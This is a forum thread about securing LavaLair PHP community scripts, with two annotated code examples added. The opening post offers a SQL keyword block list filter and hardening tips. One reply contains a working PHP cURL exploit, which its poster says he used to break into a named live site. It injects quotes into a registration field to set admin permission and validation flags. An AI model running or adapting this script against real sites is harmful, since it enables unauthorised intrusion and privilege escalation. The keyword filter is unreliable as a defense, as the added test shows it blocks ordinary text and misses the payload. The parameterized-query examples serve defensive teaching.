How to secure lavalair ALL versions


  • huwad
    replied
    thanks for sharing,, uhhm.. I think I have to try it..

    Leave a comment:


  • firemax
    replied
    Here is the tool I used to crack into the target site:


    <?php
    class Browser {
    function __construct($ua="") {
    $this->UserAgent = $ua;
    }
    public $curl, $count, $data,$UserAgent;
    function url($url) { $this->curl = curl_init($url); }
    function fields($count) { $this->count = $count; }
    function data($data) { $this->data = strtolower($data); }
    function send() {
    curl_setopt($this->curl, CURLOPT_POST, $this->count);
    if(!empty($this->UserAgent)) {
    curl_setopt($this->curl, CURLOPT_USERAGENT, $this->UserAgent);
    }
    curl_setopt($this->curl, CURLOPT_POSTFIELDS, $this->data);
    curl_setopt($this->curl, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($this->curl);
    curl_close($this->curl);
    return $result;
    }

    }

    $uid = "masnun";

    $info = "fear the geek, since you must!',perm='4',validated='1'#";
    $m = new Browser("Samsung SGH C160");
    $m->url("http://kalponik.freehostia.com/web/register.php");
    $m->fields(12);
    $m->data("uid=$uid&pwd=masnun&cpw=masnun&day=31&month =03-&year=1987-&usx=M&ulc=BD&email=none&info=$info");

    print_r($m->send());

    ?>

    The easiest explanation is that LavaLair by default requires magic_quotes_gpc() to be off and its insert SQLs are in the format:

    INSERT INTO table_name SET column_1='value_1', column_2 ='value_2'

    So, it becomes easy to inject some single quotes and hash sign to terminate the script and modify it the way you wish.

    My suggestion would be to use Insert SQLs in this way:

    INSERT INTO table_name (column_1,column_2) VALUES ('value_1','value_2')

    And now a little rant about these so-called hackers… I have heard lots of stories about AyOn and some other freaks terrorizing the LL community… It’s really funny the way the developers never bothered to learn how these script kiddies or so-called hackers managed their way in… From the very beginning, I have used J21Community with magic_quotes_gpc turned on and secure SQL queries. That’s one of the important reasons why no J21Community site has been hacked yet by SQL Injection… :D
    (copy from blog)

    Leave a comment:
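
Added example (not part of the post above and not LavaLair code): a registration insert that binds every submitted value as a parameter, so quote and `#` characters in a field are stored as text and `perm`/`validated` are set only by the server. The table name `users`, the function `register_user()` and the in-memory SQLite database (needs the pdo_sqlite extension) are assumptions for the demo; column names follow the form fields in the post.

```php
<?php
// Added example. register_user() and the "users" table are hypothetical.
function register_user(PDO $db, array $form): int
{
    // perm and validated are fixed by the server, never read from the request.
    $stmt = $db->prepare(
        'INSERT INTO users (uid, pwd, email, info, perm, validated)
         VALUES (:uid, :pwd, :email, :info, 0, 0)'
    );
    $stmt->execute([
        ':uid'   => $form['uid'],
        ':pwd'   => password_hash($form['pwd'], PASSWORD_DEFAULT), // never store plaintext
        ':email' => $form['email'],
        ':info'  => $form['info'],
    ]);
    return (int) $db->lastInsertId();
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (
    id INTEGER PRIMARY KEY, uid TEXT UNIQUE, pwd TEXT, email TEXT,
    info TEXT, perm INTEGER NOT NULL, validated INTEGER NOT NULL)');

// Constructed form input; the info value is the quote-laden string from the post.
$form = [
    'uid'   => 'testuser',
    'pwd'   => 'correct horse battery staple',
    'email' => 'none',
    'info'  => "fear the geek, since you must!',perm='4',validated='1'#",
];
$id = register_user($db, $form);

$check = $db->prepare('SELECT info, perm, validated FROM users WHERE id = :id');
$check->execute([':id' => $id]);
$row = $check->fetch(PDO::FETCH_ASSOC);

// The info text comes back byte for byte; the privilege columns keep their defaults.
var_dump($row['info'] === $form['info']);
var_dump((int) $row['perm'], (int) $row['validated']);
```

Changing `INSERT ... SET` to `INSERT ... VALUES` does not by itself make a quoted value safe; the binding (or correct escaping) of each value is what does. With MySQL, create the PDO connection with `PDO::ATTR_EMULATE_PREPARES` set to `false` so the server performs the binding.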


  • Mysterio
    replied
    no wapmetal. Just remove the [img=][/img].

    Leave a comment:


  • wapmetal
    replied
    tnx for this man -up-
    Last edited by wapmetal; 09.10.10, 14:50.

    Leave a comment:


  • wapmetal
    replied
    Hope it will work so shell dont works!

    Leave a comment:


  • jefweewap
    replied
    this is great thanks.......

    Leave a comment:


  • subzero
    started a topic How to secure lavalair ALL versions

    How to secure lavalair ALL versions!!!!!!!

    Wapspire v1,v2
    fummobile v1
    aarawap v1

    Yes you hear me right they all are lavalair scripts !!!!!

    First Lets get to know how...

    Place this in your core.php

    PHP Code:
    function check_injection()
    {
        // SQL keywords to look for in request values
        $badchars = array("DROP","TRUNCATE","SELECT","UPDATE","DELETE","UNION","WHERE","FROM","INSERT","ORDER BY");

        foreach ($_REQUEST as $value)
        {
            // array parameters (field[]=...) are flattened to one string before checking
            $value = is_array($value) ? json_encode($value) : (string) $value;

            foreach ($badchars as $word)
            {
                // match the keyword as a whole word anywhere in the value, ignoring case
                if (preg_match('/\b' . preg_quote($word, '/') . '\b/i', $value))
                {
                    $logfile = 'logs/log.txt'; // chmod 777
                    $IP = $_SERVER['REMOTE_ADDR'];
                    $logdetails = date("F j, Y, g:i a") . ': ' . '<a href=http://dnsstuff.com/tools/city.ch?ip=' . $IP . ' target=_blank>' . $IP . '</a>' . "\n";
                    $fp = fopen($logfile, "a"); // append, so earlier entries are not overwritten
                    if ($fp)
                    {
                        fwrite($fp, $logdetails, strlen($logdetails));
                        fclose($fp);
                    }

                    header('Location:http://google.com');
                    exit; // stop the page once the redirect has been sent
                }
            }
        }
    }

    Add this to ALL of your headers, before <html or <doctype, under the core.php include:

    "
    include("core.php");
    check_injection();
    "

    Step 2:

    Do Not Host a UPLOADER

    Step 3:

    Don't let users hotlink images as their avatar; delete this ASAP from your site, or host it with a PHP thumb script. You may search this forum for it!!

    Step 4:

    Do not save logs in logs or any txt files to members/owners info

    Step 5

    Do not use easy passwords like eg: 123456 , abc1234 , password , guest , john , orbit

    Most guest password is your username as your password you must not sign up like

    username: john1942
    password: john1942

    End of page.......

    If you are still getting hacked / sql / hijacked, this means you didn't go through the steps as I told you...
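
Added example (not part of the post above): the keyword list from `check_injection()` run over a few request values, to show what a word filter of this kind blocks and what it lets through. `keyword_hits()` and `evaluate()` are hypothetical helpers and the sample values are constructed, except the `info` string, which is the one quoted in the reply in this thread.

```php
<?php
// Added example. Helpers are hypothetical; the word list is the one from the post.
function keyword_hits(string $value, array $words): array
{
    $hits = [];
    foreach ($words as $word) {
        // whole-word, case-insensitive match anywhere in the value
        if (preg_match('/\b' . preg_quote($word, '/') . '\b/i', $value)) {
            $hits[] = $word;
        }
    }
    return $hits;
}

function evaluate(array $samples, array $words): array
{
    $report = [];
    foreach ($samples as $label => $value) {
        $hits = keyword_hits($value, $words);
        $report[$label] = $hits ? 'BLOCKED: ' . implode(', ', $hits) : 'allowed';
    }
    return $report;
}

$words = ["DROP","TRUNCATE","SELECT","UPDATE","DELETE","UNION","WHERE","FROM","INSERT","ORDER BY"];

// Constructed request values, labelled with the outcome a site owner would want.
$samples = [
    'chat message (should pass)' => 'Where are you from? Update me later',
    'profile text (should pass)' => 'Please select a nickname and drop me a line',
    'info field from the reply (should be neutralised)' =>
        "fear the geek, since you must!',perm='4',validated='1'#",
];

print_r(evaluate($samples, $words));
```

The two ordinary messages are blocked and the quoted `info` value is allowed, because it contains none of the listed words. A filter like this can feed a log for review, but the queries themselves still need bound parameters or correct escaping.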